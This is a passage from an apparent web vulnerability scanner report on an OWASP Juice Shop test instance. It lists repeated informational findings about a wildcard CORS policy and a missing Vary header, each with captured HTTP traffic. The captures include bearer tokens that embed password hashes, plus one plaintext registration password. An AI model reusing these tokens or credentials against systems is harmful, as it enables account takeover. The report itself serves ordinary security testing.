    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    X-User-Email: mike_landeck@hotmail.com
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 273
    ETag: W/"111-kN9lwwZX7ncQdN7Gcmol2w"
    Date: Sun, 15 Jan 2017 21:50:47 GMT
    Connection: close

    {"status":"success","data":{"id":4,"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"image":"raspberry_juice.jpg","createdAt":"2017-01-15
    ...[SNIP]...
    15.12. http://192.168.61.143:3000/api/Products/6

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/6

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/6?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 244
    ETag: W/"f4-TwNeU7jJ9LOASbCyrxRDhw"
    Date: Sun, 15 Jan 2017 21:01:16 GMT
    Connection: close

    {"status":"success","data":{"id":6,"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"
    ...[SNIP]...
    15.13. http://192.168.61.143:3000/api/Products/7

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/7

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/7?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    X-User-Email: mike_landeck@hotmail.com
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 243
    ETag: W/"f3-6fgy/TbTSjBKeUlhiAqA2g"
    Date: Sun, 15 Jan 2017 21:51:08 GMT
    Connection: close

    {"status":"success","data":{"id":7,"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"image":"fan_shirt.jpg","createdAt":"2017-01-15T21:40:01.000Z","updatedAt":"2
    ...[SNIP]...
    15.14. http://192.168.61.143:3000/api/Products/8

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/8

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/8?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 483
    ETag: W/"1e3-mC3tm9U3/CQVlyF/P8fgvQ"
    Date: Sun, 15 Jan 2017 21:01:20 GMT
    Connection: close

    {"status":"success","data":{"id":8,"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connectio
    ...[SNIP]...
    15.15. http://192.168.61.143:3000/api/Users/

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Users/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /api/Users/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 108
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 195
    ETag: W/"c3-Ld7Wb7VM2wAocUpR89IOIg"
    Date: Sun, 15 Jan 2017 21:00:53 GMT
    Connection: close

    {"status":"success","data":{"email":"mike_landeck@hotmail.com","password":"a992b1b403cba28afb428e7f5a35c516","id":7,"updatedAt":"2017-01-15T21:00:53.000Z","createdAt":"2017-01-15T21:00:53.000Z"}}
    15.16. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-animate/angular-animate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-animate/angular-animate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
    ETag: W/"647a-159073e17f8"
    Content-Type: application/javascript
    Content-Length: 25722
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(R,B){'use strict';function Da(a,b,c){if(!a)throw Ma("areq",b||"?",c||"required");return a}function Ea(
    ...[SNIP]...
    15.17. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-base64/angular-base64.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-base64/angular-base64.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 18 May 2015 10:39:05 GMT
    ETag: W/"16d4-14d669b0528"
    Content-Type: application/javascript
    Content-Length: 5844
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    (function() {
    'use strict';

    /*
    * Encapsulation of Nick Galbreath's base64.js library for AngularJS
    * Original notice included below
    */

    /*
    * Copyright (c) 2010 Nick Ga
    ...[SNIP]...
    15.18. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
    ETag: W/"1e014-1575a69d9c8"
    Content-Type: application/javascript
    Content-Length: 122900
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * angular-ui-bootstrap
    * http://angular-ui.github.io/bootstrap/

    * Version: 2.1.4 - 2016-09-23
    * License: MIT
    */angular.module("ui.bootstrap",["ui.bootstrap.tpls","ui.bootstrap.collapse","ui.b
    ...[SNIP]...
    15.19. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-bootstrap/ui-bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
    ETag: W/"189dd-1575a69d9c8"
    Content-Type: application/javascript
    Content-Length: 100829
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * angular-ui-bootstrap
    * http://angular-ui.github.io/bootstrap/

    * Version: 2.1.4 - 2016-09-23
    * License: MIT
    */angular.module("ui.bootstrap",["ui.bootstrap.collapse","ui.bootstrap.tabindex","
    ...[SNIP]...
    15.20. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-cookies/angular-cookies.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
    ETag: W/"5a8-159073e17f8"
    Content-Type: application/javascript
    Content-Length: 1448
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(n,c){'use strict';function l(b,a,g){var d=g.baseHref(),k=b[0];return function(b,e,f){var g,h;f=f||{};h
    ...[SNIP]...
    15.21. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-qrcode/angular-qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 02 Apr 2016 10:19:01 GMT
    ETag: W/"1493-153d67ba608"
    Content-Type: application/javascript
    Content-Length: 5267
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * angular-qrcode v6.2.1
    * (c) 2013 Monospaced http://monospaced.com
    * License: MIT
    */

    angular.module('monospaced.qrcode', [])
    .directive('qrcode', ['$window', function($window) {

    var ca
    ...[SNIP]...
    15.22. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-route/angular-route.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-route/angular-route.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
    ETag: W/"12b2-159073e1be0"
    Content-Type: application/javascript
    Content-Length: 4786
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(E,d){'use strict';function y(t,l,g){return{restrict:"ECA",terminal:!0,priority:400,transclude:"element
    ...[SNIP]...
    15.23. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-socket-io/socket.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-socket-io/socket.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 08 Dec 2014 04:04:30 GMT
    ETag: W/"50b-14a2811e8b0"
    Content-Type: application/javascript
    Content-Length: 1291
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * @license
    * angular-socket-io v0.7.0
    * (c) 2014 Brian Ford http://briantford.com
    * License: MIT
    */
    angular.module("btford.socket-io",[]).provider("socketFactory",function(){"use strict";var n
    ...[SNIP]...
    15.24. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-touch/angular-touch.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-touch/angular-touch.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
    ETag: W/"fca-159073e1be0"
    Content-Type: application/javascript
    Content-Length: 4042
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(x,n){'use strict';function s(f,k){var e=!1,a=!1;this.ngClickOverrideEnabled=function(b){return n.isDef
    ...[SNIP]...
    15.25. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 06 Dec 2016 18:57:00 GMT
    ETag: W/"55b-158d57f0060"
    Content-Type: application/javascript
    Content-Length: 1371
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * angular-translate - v2.13.1 - 2016-12-06
    *
    * Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
    */
